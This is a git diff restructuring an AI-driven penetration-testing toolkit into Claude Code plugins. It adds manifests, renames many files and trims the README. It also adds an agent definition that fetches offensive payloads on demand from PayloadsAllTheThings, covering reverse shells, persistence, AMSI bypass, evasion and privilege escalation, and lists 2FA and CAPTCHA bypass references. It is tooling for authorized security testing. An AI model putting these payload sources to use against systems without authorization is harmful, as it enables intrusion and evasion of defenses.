/pr with issue link] - I --> J{Code Review} - J -->|Changes Requested| D - J -->|Approved| K[Merged! 🎉] - - style K fill:#4CAF50,color:#fff - style C fill:#2196F3,color:#fff - style G fill:#FF9800,color:#fff -``` +```bash +# 1. Create an issue first +gh issue create --title "Add skill: X" --body "Description..." -**Git Workflow Agents:** -- `/issue` - Creates well-formatted GitHub issues -- `/branch` - Creates conventional branches (feature/, bugfix/, docs/) -- `/commit` - Auto-generates conventional commit messages -- `/pr` - Creates PRs with auto-generated descriptions linking to issues +# 2. Create branch +git checkout -b feature/skill-name -**Read the full guide:** [CONTRIBUTING.md](CONTRIBUTING.md) +# 3. Add your skill under the appropriate plugin: +# plugins//skills//SKILL.md + +# 4. Commit with conventional format +git commit -m "feat(): add skill - Fixes #" -### Good First Issues +# 5. Push and create PR +gh pr create --title "..." --body "Closes #" +``` -New to contributing? Check out our [Good First Issues](https://github.com/transilienceai/communitytools/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22) to get started! +**Read the full guide:** [CONTRIBUTING.md](CONTRIBUTING.md) --- ## ⚠️ Security & Legal -### Legal Notice - **⚠️ IMPORTANT: These tools are designed for authorized security testing ONLY.** -```mermaid -flowchart TB - A{Do you have written authorization?} - A -->|Yes| B[✅ Legal Use] - A -->|No| C[❌ ILLEGAL - DO NOT USE] - - B --> D[Authorized Pentesting] - B --> E[Bug Bounty Programs] - B --> F[Security Research] - B --> G[CTF Competitions] - B --> H[Your Own Systems] - - C --> I[Unauthorized Access = CRIME] - C --> J[Legal Consequences] - C --> K[Criminal Prosecution] - - style B fill:#4CAF50,color:#fff - style C fill:#F44336,color:#fff - style I fill:#F44336,color:#fff - style J fill:#F44336,color:#fff - style K fill:#F44336,color:#fff -``` - -### Ethical Use Guidelines - ✅ **Authorized & Legal Use:** - Penetration testing with written authorization - Bug bounty programs within scope @@ -791,7 +423,6 @@ flowchart TB - Unauthorized testing of any systems - Malicious exploitation of vulnerabilities - Data theft or system disruption -- Testing without explicit written permission - Any use that violates local or international laws **Users are solely responsible for compliance with all applicable laws and regulations.** @@ -799,44 +430,25 @@ flowchart TB ### Responsible Disclosure If you discover a vulnerability using these tools: - -1. **Do not exploit** beyond proof-of-concept -2. **Report immediately** to the vendor/organization -3. **Follow responsible disclosure** timelines (typically 90 days) -4. **Document thoroughly** for remediation -5. **Share knowledge** after resolution (if permitted) +1. Do not exploit beyond proof-of-concept +2. Report immediately to the vendor/organization +3. Follow responsible disclosure timelines (typically 90 days) +4. Document thoroughly for remediation --- ## 🌐 About Transilience AI -[**Transilience AI**](https://www.transilience.ai) is a leading AI-powered security company specializing in: - -- 🤖 **Autonomous Security Testing** - AI-driven penetration testing and vulnerability assessment -- 🔍 **Threat Intelligence** - Real-time threat detection and analysis -- 🛡️ **AI Security Operations** - Intelligent incident response and security automation -- 🔐 **Compliance Management** - Automated compliance monitoring and reporting -- 🎯 **Vulnerability Research** - Zero-day discovery and security research - -We believe in giving back to the security community by open-sourcing our tools and frameworks. +[**Transilience AI**](https://www.transilience.ai) specializes in autonomous security testing and AI security operations. --- ## 📞 Community & Support -### Get Help - -- 💬 **[GitHub Discussions](https://github.com/transilienceai/communitytools/discussions)** - Ask questions, share ideas -- 🐛 **[GitHub Issues](https://github.com/transilienceai/communitytools/issues)** - Report bugs, request features -- 🌐 **[Website](https://www.transilience.ai)** - Company information and commercial products -- 📧 **[Email](mailto:contact@transilience.ai)** - Direct support for enterprise users - -### Stay Updated - -- ⭐ **Star this repository** to get updates -- 👀 **Watch releases** for new versions -- 🐦 **Follow us on social media** for news and updates -- 📰 **Read our blog** for security insights +- 💬 **[GitHub Discussions](https://github.com/transilienceai/communitytools/discussions)** — Ask questions, share ideas +- 🐛 **[GitHub Issues](https://github.com/transilienceai/communitytools/issues)** — Report bugs, request features +- 🌐 **[Website](https://www.transilience.ai)** — Commercial products +- 📧 **[Email](mailto:contact@transilience.ai)** — Enterprise support --- @@ -844,161 +456,76 @@ We believe in giving back to the security community by open-sourcing our tools a ### Current Status -**Released Skills:** -- ✅ **Pentest Skill** - 46+ attack types, 264+ lab walkthroughs, 35+ specialized agents -- ✅ **HackerOne Skill** - Bug bounty automation from scope parsing to submission -- ✅ **CVE Testing** - Vulnerability testing and exploitation framework -- ✅ **Domain Assessment** - Subdomain discovery and port scanning -- ✅ **Web App Mapping** - Endpoint discovery and technology detection -- ✅ **Common AppSec Patterns** - OWASP Top 10 testing -- ✅ **Authenticating** - Auth testing, 2FA bypass, bot evasion -- ✅ **Git Workflow Agents** - Issue, branch, commit, PR automation -- ✅ **Skiller Agent** - Skill creation and management - -### Planned Enhancements - -**Q1 2026** -- [ ] **Enhanced CVE Database Integration** - Automated CVE-to-test mapping -- [ ] **Burp Suite Integration Skill** - Export/import findings from Burp -- [ ] **Nuclei Template Skill** - Convert Nuclei templates to agent workflows -- [ ] **OWASP ZAP Integration** - ZAP API integration for automation +**Released Plugins:** +- ✅ **pentest** — 6 skills, 3 agents, 46+ attack types, 264+ lab walkthroughs +- ✅ **hackerone** — Bug bounty automation from scope parsing to submission +- ✅ **ai-threat-testing** — OWASP LLM Top 10 with 10 dedicated agents +- ✅ **techstack-identification** — 26 skills, 5 agents, lifecycle hooks +- ✅ **skiller** — Skill creation meta-tool with full GitHub workflow + +### Planned **Q2 2026** -- [ ] **Cloud Security Skills** - AWS, Azure, GCP misconfigurations -- [ ] **Container Security Skill** - Docker and Kubernetes testing -- [ ] **Mobile Security Skill** - iOS and Android app testing -- [ ] **API Security Enhancement** - gRPC, WebSocket advanced testing +- [ ] **Cloud Security Plugin** — Full GCP coverage + orchestrated cloud misconfig skill +- [ ] **Container Security Plugin** — Docker and Kubernetes testing +- [ ] **Mobile Security Plugin** — iOS and Android app testing +- [ ] **Burp Suite Integration** — Export/import findings **Q3 2026** -- [ ] **Compliance Reporting** - PCI-DSS, SOC 2, ISO 27001 report generation -- [ ] **AI/ML Security Skill** - LLM prompt injection, model poisoning -- [ ] **Blockchain Security** - Smart contract auditing agents -- [ ] **IoT Security Skill** - Firmware and embedded device testing +- [ ] **Compliance Reporting** — PCI-DSS, SOC 2, ISO 27001 report generation +- [ ] **Blockchain Security** — Smart contract auditing agents +- [ ] **IoT Security Plugin** — Firmware and embedded device testing **Community Contributions Welcome:** -- 🎯 New specialized vulnerability agents -- 📝 Additional lab walkthroughs and tutorials -- 🔧 Tool integrations (Metasploit, Nmap, etc.) -- 🌐 Bug bounty platform integrations (Bugcrowd, Intigriti, YesWeHack) -- 📊 Enhanced reporting templates - -**Vote on features:** [Feature Requests](https://github.com/transilienceai/communitytools/discussions/categories/feature-requests) +- New specialized vulnerability agents +- Additional lab walkthroughs +- Tool integrations (Metasploit, Nmap, etc.) +- Bug bounty platform integrations (Bugcrowd, Intigriti, YesWeHack) --- ## 📊 Project Stats -**Repository Metrics:** - -| Category | Count | Description | -|----------|-------|-------------| -| 🎯 **Security Skills** | 7 | Main security testing workflows | -| 🤖 **Specialized Agents** | 35+ | Vulnerability-specific testing agents | -| 🔧 **Orchestration Agents** | 6 | Workflow coordinators (pentest, hackerone, git) | -| 📝 **Slash Commands** | 14 | User-invocable commands | -| 📚 **Lab Walkthroughs** | 264+ | PortSwigger Academy solutions | -| 🎓 **Attack Types** | 46+ | Documented exploitation techniques | -| 📊 **Output Standards** | 3 | Standardized formats (recon, vuln, bounty) | - -**Vulnerability Coverage:** -- ✅ OWASP Top 10 (2021) - 100% coverage -- ✅ SANS Top 25 CWE - 90%+ coverage -- ✅ MITRE ATT&CK TTPs - Mapped for all findings -- ✅ CVSS 3.1 Scoring - All vulnerability findings - ---- - -## 🙏 Acknowledgments - -These tools are made possible by: - -- 🌟 The amazing **global security research community** -- 🛠️ Open-source **security tool developers** and maintainers -- 🤖 **Claude AI** by Anthropic for powering our AI capabilities -- 💼 Our **customers and partners** who provide invaluable feedback -- 👥 **Contributors** who make these tools better every day - -### Special Thanks - -We'd like to give special recognition to: -- OWASP Foundation for security standards -- Bug bounty platforms (HackerOne, Bugcrowd, Synack) -- Security researchers who responsibly disclose vulnerabilities -- The open-source community for their continuous support +| Category | Count | +|----------|-------| +| **Plugins** | 5 | +| **Skills** | 35+ | +| **Agents** | 20+ | +| **Lifecycle Hooks** | 3 | +| **Lab Walkthroughs** | 264+ | +| **Attack Types** | 46+ | +| **PATT Payload Files** | 50+ | + +**Coverage:** +- ✅ OWASP Top 10 (2021) — 100% +- ✅ OWASP LLM Top 10 (2025) — 100% +- ✅ SANS Top 25 CWE — 90%+ +- ✅ MITRE ATT&CK TTPs — mapped for all findings --- ## 📝 License -All tools in this repository are licensed under the **MIT License** unless otherwise specified. See [LICENSE](LICENSE) file for details. - -``` -MIT License - Copyright (c) 2025 Transilience AI - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is furnished -to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. -``` - -**What this means:** -- ✅ Commercial use allowed -- ✅ Modification allowed -- ✅ Distribution allowed -- ✅ Private use allowed -- ⚠️ No warranty provided -- ⚠️ No liability accepted +MIT License — Copyright (c) 2025 Transilience AI. See [LICENSE](LICENSE) for details. --- ## 🏆 Contributors -This project exists thanks to all the people who contribute! - -**Want to see your name here?** Check out our [Contributing Guide](CONTRIBUTING.md)! - ---- - -## 📈 GitHub Repository Stats - -![GitHub last commit](https://img.shields.io/github/last-commit/transilienceai/communitytools) -![GitHub commit activity](https://img.shields.io/github/commit-activity/m/transilienceai/communitytools) -![GitHub contributors](https://img.shields.io/github/contributors/transilienceai/communitytools) -![GitHub repo size](https://img.shields.io/github/repo-size/transilienceai/communitytools) - ---
-## 🌟 Support This Project - -If you find these tools useful, please consider: - -[![Star this repository](https://img.shields.io/badge/⭐-Star%20this%20repo-yellow?style=for-the-badge)](https://github.com/transilienceai/communitytools) -[![Share on Twitter](https://img.shields.io/badge/Share-Twitter-1DA1F2?style=for-the-badge&logo=twitter&logoColor=white)](https://twitter.com/intent/tweet?text=Check%20out%20Transilience%20AI%20Community%20Tools%20-%20Open%20source%20security%20testing%20frameworks!&url=https://github.com/transilienceai/communitytools) -[![Follow on LinkedIn](https://img.shields.io/badge/Follow-LinkedIn-0077B5?style=for-the-badge&logo=linkedin&logoColor=white)](https://www.linkedin.com/company/transilienceai) - ---- - **Built with ❤️ by [Transilience AI](https://www.transilience.ai)** -⭐ **Star this repo to support open-source security tools!** ⭐ - -[Website](https://www.transilience.ai) • [Tools](https://github.com/transilienceai/communitytools) • [Report Issue](https://github.com/transilienceai/communitytools/issues) • [Discussions](https://github.com/transilienceai/communitytools/discussions) - ---- +[![Star this repository](https://img.shields.io/badge/⭐-Star%20this%20repo-yellow?style=for-the-badge)](https://github.com/transilienceai/communitytools) -### 🔖 Keywords for Discoverability +[Website](https://www.transilience.ai) • [Issues](https://github.com/transilienceai/communitytools/issues) • [Discussions](https://github.com/transilienceai/communitytools/discussions) -`claude-code` `claude-ai` `ai-security` `penetration-testing` `security-testing` `bug-bounty` `owasp` `vulnerability-scanner` `pentesting-tools` `security-automation` `ethical-hacking` `cybersecurity` `infosec` `appsec` `web-security` `api-security` `security-research` `vulnerability-assessment` `security-tools` `open-source-security` `devsecops` `playwright-automation` `hackerone` `bugcrowd` `portswigger` `bscp` `oscp` `multi-agent` `ai-agents` +`claude-code` `claude-plugins` `ai-security` `penetration-testing` `bug-bounty` `owasp` `llm-security` `ai-threat-testing` `techstack` `security-automation` `ethical-hacking` `cybersecurity` `appsec` `web-security` `hackerone` `portswigger` `multi-agent`
diff --git a/plugins/ai-threat-testing/.claude-plugin/plugin.json b/plugins/ai-threat-testing/.claude-plugin/plugin.json new file mode 100644 index 0000000..800d8a1 --- /dev/null +++ b/plugins/ai-threat-testing/.claude-plugin/plugin.json @@ -0,0 +1,11 @@ +{ + "name": "ai-threat-testing", + "version": "1.0.0", + "description": "AI security testing — OWASP LLM Top 10 coverage with dedicated agents for prompt injection, model extraction, supply chain, and more", + "author": { + "name": "Transilience AI", + "url": "https://github.com/transilienceai" + }, + "repository": "https://github.com/transilienceai/communitytools", + "license": "MIT" +} diff --git a/projects/pentest/.claude/skills/ai-threat-testing/agents/llm01-prompt-injection.md b/plugins/ai-threat-testing/agents/llm01-prompt-injection.md similarity index 100% rename from projects/pentest/.claude/skills/ai-threat-testing/agents/llm01-prompt-injection.md rename to plugins/ai-threat-testing/agents/llm01-prompt-injection.md diff --git a/projects/pentest/.claude/skills/ai-threat-testing/agents/llm02-insecure-output.md b/plugins/ai-threat-testing/agents/llm02-insecure-output.md similarity index 100% rename from projects/pentest/.claude/skills/ai-threat-testing/agents/llm02-insecure-output.md rename to plugins/ai-threat-testing/agents/llm02-insecure-output.md diff --git a/projects/pentest/.claude/skills/ai-threat-testing/agents/llm03-training-poisoning.md b/plugins/ai-threat-testing/agents/llm03-training-poisoning.md similarity index 100% rename from projects/pentest/.claude/skills/ai-threat-testing/agents/llm03-training-poisoning.md rename to plugins/ai-threat-testing/agents/llm03-training-poisoning.md diff --git a/projects/pentest/.claude/skills/ai-threat-testing/agents/llm04-resource-exhaustion.md b/plugins/ai-threat-testing/agents/llm04-resource-exhaustion.md similarity index 100% rename from projects/pentest/.claude/skills/ai-threat-testing/agents/llm04-resource-exhaustion.md rename to plugins/ai-threat-testing/agents/llm04-resource-exhaustion.md diff --git a/projects/pentest/.claude/skills/ai-threat-testing/agents/llm05-supply-chain.md b/plugins/ai-threat-testing/agents/llm05-supply-chain.md similarity index 100% rename from projects/pentest/.claude/skills/ai-threat-testing/agents/llm05-supply-chain.md rename to plugins/ai-threat-testing/agents/llm05-supply-chain.md diff --git a/projects/pentest/.claude/skills/ai-threat-testing/agents/llm06-excessive-agency.md b/plugins/ai-threat-testing/agents/llm06-excessive-agency.md similarity index 100% rename from projects/pentest/.claude/skills/ai-threat-testing/agents/llm06-excessive-agency.md rename to plugins/ai-threat-testing/agents/llm06-excessive-agency.md diff --git a/projects/pentest/.claude/skills/ai-threat-testing/agents/llm07-model-extraction.md b/plugins/ai-threat-testing/agents/llm07-model-extraction.md similarity index 100% rename from projects/pentest/.claude/skills/ai-threat-testing/agents/llm07-model-extraction.md rename to plugins/ai-threat-testing/agents/llm07-model-extraction.md diff --git a/projects/pentest/.claude/skills/ai-threat-testing/agents/llm08-vector-poisoning.md b/plugins/ai-threat-testing/agents/llm08-vector-poisoning.md similarity index 100% rename from projects/pentest/.claude/skills/ai-threat-testing/agents/llm08-vector-poisoning.md rename to plugins/ai-threat-testing/agents/llm08-vector-poisoning.md diff --git a/projects/pentest/.claude/skills/ai-threat-testing/agents/llm09-overreliance.md b/plugins/ai-threat-testing/agents/llm09-overreliance.md similarity index 100% rename from projects/pentest/.claude/skills/ai-threat-testing/agents/llm09-overreliance.md rename to plugins/ai-threat-testing/agents/llm09-overreliance.md diff --git a/projects/pentest/.claude/skills/ai-threat-testing/agents/llm10-logging-bypass.md b/plugins/ai-threat-testing/agents/llm10-logging-bypass.md similarity index 100% rename from projects/pentest/.claude/skills/ai-threat-testing/agents/llm10-logging-bypass.md rename to plugins/ai-threat-testing/agents/llm10-logging-bypass.md diff --git a/projects/pentest/.claude/skills/ai-threat-testing/README.md b/plugins/ai-threat-testing/skills/ai-threat-testing/README.md similarity index 100% rename from projects/pentest/.claude/skills/ai-threat-testing/README.md rename to plugins/ai-threat-testing/skills/ai-threat-testing/README.md diff --git a/projects/pentest/.claude/skills/ai-threat-testing/SKILL.md b/plugins/ai-threat-testing/skills/ai-threat-testing/SKILL.md similarity index 100% rename from projects/pentest/.claude/skills/ai-threat-testing/SKILL.md rename to plugins/ai-threat-testing/skills/ai-threat-testing/SKILL.md diff --git a/plugins/hackerone/.claude-plugin/plugin.json b/plugins/hackerone/.claude-plugin/plugin.json new file mode 100644 index 0000000..f77b4bc --- /dev/null +++ b/plugins/hackerone/.claude-plugin/plugin.json @@ -0,0 +1,11 @@ +{ + "name": "hackerone", + "version": "1.0.0", + "description": "HackerOne bug bounty integration — report generation, CSV parsing, sensitive data tracking, and platform-ready submissions", + "author": { + "name": "Transilience AI", + "url": "https://github.com/transilienceai" + }, + "repository": "https://github.com/transilienceai/communitytools", + "license": "MIT" +} diff --git a/projects/pentest/.claude/agents/hackerone.md b/plugins/hackerone/agents/hackerone.md similarity index 100% rename from projects/pentest/.claude/agents/hackerone.md rename to plugins/hackerone/agents/hackerone.md diff --git a/projects/pentest/.claude/skills/hackerone/README.md b/plugins/hackerone/skills/hackerone/README.md similarity index 100% rename from projects/pentest/.claude/skills/hackerone/README.md rename to plugins/hackerone/skills/hackerone/README.md diff --git a/projects/pentest/.claude/skills/hackerone/SKILL.md b/plugins/hackerone/skills/hackerone/SKILL.md similarity index 100% rename from projects/pentest/.claude/skills/hackerone/SKILL.md rename to plugins/hackerone/skills/hackerone/SKILL.md diff --git a/projects/pentest/.claude/skills/hackerone/reference/INTEGRATION_GUIDE.md b/plugins/hackerone/skills/hackerone/reference/INTEGRATION_GUIDE.md similarity index 100% rename from projects/pentest/.claude/skills/hackerone/reference/INTEGRATION_GUIDE.md rename to plugins/hackerone/skills/hackerone/reference/INTEGRATION_GUIDE.md diff --git a/projects/pentest/.claude/skills/hackerone/reference/README.md b/plugins/hackerone/skills/hackerone/reference/README.md similarity index 100% rename from projects/pentest/.claude/skills/hackerone/reference/README.md rename to plugins/hackerone/skills/hackerone/reference/README.md diff --git a/projects/pentest/.claude/skills/hackerone/reference/SENSITIVE_DATA_METADATA.md b/plugins/hackerone/skills/hackerone/reference/SENSITIVE_DATA_METADATA.md similarity index 100% rename from projects/pentest/.claude/skills/hackerone/reference/SENSITIVE_DATA_METADATA.md rename to plugins/hackerone/skills/hackerone/reference/SENSITIVE_DATA_METADATA.md diff --git a/projects/pentest/.claude/skills/hackerone/tools/__init__.py b/plugins/hackerone/skills/hackerone/tools/__init__.py similarity index 100% rename from projects/pentest/.claude/skills/hackerone/tools/__init__.py rename to plugins/hackerone/skills/hackerone/tools/__init__.py diff --git a/projects/pentest/.claude/skills/hackerone/tools/csv_parser.py b/plugins/hackerone/skills/hackerone/tools/csv_parser.py similarity index 100% rename from projects/pentest/.claude/skills/hackerone/tools/csv_parser.py rename to plugins/hackerone/skills/hackerone/tools/csv_parser.py diff --git a/projects/pentest/.claude/skills/hackerone/tools/report_validator.py b/plugins/hackerone/skills/hackerone/tools/report_validator.py similarity index 100% rename from projects/pentest/.claude/skills/hackerone/tools/report_validator.py rename to plugins/hackerone/skills/hackerone/tools/report_validator.py diff --git a/projects/pentest/.claude/skills/hackerone/tools/sensitive_data_tracker.py b/plugins/hackerone/skills/hackerone/tools/sensitive_data_tracker.py similarity index 100% rename from projects/pentest/.claude/skills/hackerone/tools/sensitive_data_tracker.py rename to plugins/hackerone/skills/hackerone/tools/sensitive_data_tracker.py diff --git a/plugins/pentest/.claude-plugin/plugin.json b/plugins/pentest/.claude-plugin/plugin.json new file mode 100644 index 0000000..c0b9359 --- /dev/null +++ b/plugins/pentest/.claude-plugin/plugin.json @@ -0,0 +1,11 @@ +{ + "name": "pentest", + "version": "1.0.0", + "description": "Full penetration testing framework — 100+ attack categories covering OWASP, injection, authentication, cloud, and more", + "author": { + "name": "Transilience AI", + "url": "https://github.com/transilienceai" + }, + "repository": "https://github.com/transilienceai/communitytools", + "license": "MIT" +} diff --git a/projects/pentest/.claude/agents/CLAUDE.md b/plugins/pentest/CLAUDE.md similarity index 100% rename from projects/pentest/.claude/agents/CLAUDE.md rename to plugins/pentest/CLAUDE.md diff --git a/projects/pentest/.claude/agents/WORKFLOWS.md b/plugins/pentest/WORKFLOWS.md similarity index 100% rename from projects/pentest/.claude/agents/WORKFLOWS.md rename to plugins/pentest/WORKFLOWS.md diff --git a/plugins/pentest/agents/patt-fetcher.md b/plugins/pentest/agents/patt-fetcher.md new file mode 100644 index 0000000..5c2a235 --- /dev/null +++ b/plugins/pentest/agents/patt-fetcher.md @@ -0,0 +1,65 @@ +--- +name: patt-fetcher +description: On-demand PayloadsAllTheThings fetcher. Use when a pentest agent needs full payloads not in local payloads/ files. Input: PATT category name (see URL Map). Output: relevant payloads extracted from PATT GitHub raw content. +model: haiku +tools: [WebFetch] +--- + +# patt-fetcher + +Fetch and extract payloads from PayloadsAllTheThings on demand. + +## URL Map + +| Category | Raw URL | +|---|---| +| SQL Injection | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/SQL%20Injection/README.md | +| XSS | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/XSS%20Injection/README.md | +| Command Injection | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Command%20Injection/README.md | +| SSTI | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Template%20Injection/README.md | +| XXE | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/XXE%20Injection/README.md | +| SSRF | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Request%20Forgery/README.md | +| Path Traversal | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Directory%20Traversal/README.md | +| File Inclusion | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/README.md | +| LDAP Injection | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/README.md | +| NoSQL Injection | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/NoSQL%20Injection/README.md | +| Active Directory | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md | +| Linux PrivEsc | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md | +| Windows PrivEsc | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md | +| Reverse Shells | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md | +| Linux Persistence | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md | +| Windows Persistence | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md | +| Linux Evasion | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Linux%20-%20Evasion.md | +| Windows Evasion | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md | +| Hash Cracking | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Hash%20Cracking.md | +| Network Pivoting | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md | +| Mass Assignment | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Mass%20Assignment/README.md | +| Open Redirect | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Open%20Redirect/README.md | +| OAuth Misconfig | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/OAuth%20Misconfiguration/README.md | +| SAML Injection | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/SAML%20Injection/README.md | +| CORS Misconfig | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/CORS%20Misconfiguration/README.md | +| Race Condition | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Race%20Condition/README.md | +| Prototype Pollution | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Prototype%20Pollution/README.md | +| Type Juggling | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Type%20Juggling/README.md | +| Deserialization | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Insecure%20Deserialization/README.md | +| GraphQL | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/GraphQL%20Injection/README.md | +| AWS | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md | +| Azure | https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md | + +## Workflow + +1. Match input category name to URL Map (case-insensitive) +2. WebFetch the raw URL +3. Find first H2 heading matching the query term → return up to 100 lines from that heading +4. Return extracted payloads to caller + +## Error Handling + +- **404**: "PATT may have restructured this category. Check: https://github.com/swisskyrepo/PayloadsAllTheThings" +- **Rate limit / network error**: "Fetch failed — use offline curated files in `payloads/` instead" +- **Category not in URL map**: Ask caller to provide the raw URL directly + +## Curation Suggestion + +If the same category is fetched 2+ times, output: +> "Consider curating this locally: create `attacks///payloads/.md` following PATT_STANDARD.md" diff --git a/projects/pentest/.claude/agents/pentester-executor.md b/plugins/pentest/agents/pentester-executor.md similarity index 100% rename from projects/pentest/.claude/agents/pentester-executor.md rename to plugins/pentest/agents/pentester-executor.md diff --git a/projects/pentest/.claude/agents/pentester-orchestrator.md b/plugins/pentest/agents/pentester-orchestrator.md similarity index 100% rename from projects/pentest/.claude/agents/pentester-orchestrator.md rename to plugins/pentest/agents/pentester-orchestrator.md diff --git a/projects/pentest/.claude/agents/reference/OUTPUT_STRUCTURE.md b/plugins/pentest/agents/reference/OUTPUT_STRUCTURE.md similarity index 100% rename from projects/pentest/.claude/agents/reference/OUTPUT_STRUCTURE.md rename to plugins/pentest/agents/reference/OUTPUT_STRUCTURE.md diff --git a/projects/pentest/.claude/agents/reference/TEST_PLAN_FORMAT.md b/plugins/pentest/agents/reference/TEST_PLAN_FORMAT.md similarity index 100% rename from projects/pentest/.claude/agents/reference/TEST_PLAN_FORMAT.md rename to plugins/pentest/agents/reference/TEST_PLAN_FORMAT.md diff --git a/projects/pentest/.claude/skills/authenticating/README.md b/plugins/pentest/skills/authenticating/README.md similarity index 100% rename from projects/pentest/.claude/skills/authenticating/README.md rename to plugins/pentest/skills/authenticating/README.md diff --git a/projects/pentest/.claude/skills/authenticating/SKILL.md b/plugins/pentest/skills/authenticating/SKILL.md similarity index 100% rename from projects/pentest/.claude/skills/authenticating/SKILL.md rename to plugins/pentest/skills/authenticating/SKILL.md diff --git a/projects/pentest/.claude/skills/authenticating/reference/2FA_BYPASS.md b/plugins/pentest/skills/authenticating/reference/2FA_BYPASS.md similarity index 100% rename from projects/pentest/.claude/skills/authenticating/reference/2FA_BYPASS.md rename to plugins/pentest/skills/authenticating/reference/2FA_BYPASS.md diff --git a/projects/pentest/.claude/skills/authenticating/reference/BOT_DETECTION.md b/plugins/pentest/skills/authenticating/reference/BOT_DETECTION.md similarity index 100% rename from projects/pentest/.claude/skills/authenticating/reference/BOT_DETECTION.md rename to plugins/pentest/skills/authenticating/reference/BOT_DETECTION.md diff --git a/projects/pentest/.claude/skills/authenticating/reference/CAPTCHA_BYPASS.md b/plugins/pentest/skills/authenticating/reference/CAPTCHA_BYPASS.md similarity index 100% rename from projects/pentest/.claude/skills/authenticating/reference/CAPTCHA_BYPASS.md rename to plugins/pentest/skills/authenticating/reference/CAPTCHA_BYPASS.md diff --git a/projects/pentest/.claude/skills/authenticating/reference/PASSWORD_CREDENTIAL_MANAGEMENT.md b/plugins/pentest/skills/authenticating/reference/PASSWORD_CREDENTIAL_MANAGEMENT.md similarity index 100% rename from projects/pentest/.claude/skills/authenticating/reference/PASSWORD_CREDENTIAL_MANAGEMENT.md rename to plugins/pentest/skills/authenticating/reference/PASSWORD_CREDENTIAL_MANAGEMENT.md diff --git a/projects/pentest/.claude/skills/authenticating/tools/__init__.py b/plugins/pentest/skills/authenticating/tools/__init__.py similarity index 100% rename from projects/pentest/.claude/skills/authenticating/tools/__init__.py rename to plugins/pentest/skills/authenticating/tools/__init__.py diff --git a/projects/pentest/.claude/skills/authenticating/tools/credential_manager.py b/plugins/pentest/skills/authenticating/tools/credential_manager.py similarity index 100% rename from projects/pentest/.claude/skills/authenticating/tools/credential_manager.py rename to plugins/pentest/skills/authenticating/tools/credential_manager.py diff --git a/projects/pentest/.claude/skills/authenticating/tools/password_generator.py b/plugins/pentest/skills/authenticating/tools/password_generator.py similarity index 100% rename from projects/pentest/.claude/skills/authenticating/tools/password_generator.py rename to plugins/pentest/skills/authenticating/tools/password_generator.py diff --git a/projects/pentest/.claude/skills/common-appsec-patterns/SKILL.md b/plugins/pentest/skills/common-appsec-patterns/SKILL.md similarity index 100% rename from projects/pentest/.claude/skills/common-appsec-patterns/SKILL.md rename to plugins/pentest/skills/common-appsec-patterns/SKILL.md diff --git a/projects/pentest/.claude/skills/cve-testing/SKILL.md b/plugins/pentest/skills/cve-testing/SKILL.md similarity index 100% rename from projects/pentest/.claude/skills/cve-testing/SKILL.md rename to plugins/pentest/skills/cve-testing/SKILL.md diff --git a/projects/pentest/.claude/skills/domain-assessment/SKILL.md b/plugins/pentest/skills/domain-assessment/SKILL.md similarity index 100% rename from projects/pentest/.claude/skills/domain-assessment/SKILL.md rename to plugins/pentest/skills/domain-assessment/SKILL.md diff --git a/plugins/pentest/skills/pentest/PATT_STANDARD.md b/plugins/pentest/skills/pentest/PATT_STANDARD.md new file mode 100644 index 0000000..82511dd --- /dev/null +++ b/plugins/pentest/skills/pentest/PATT_STANDARD.md @@ -0,0 +1,65 @@ +# PATT 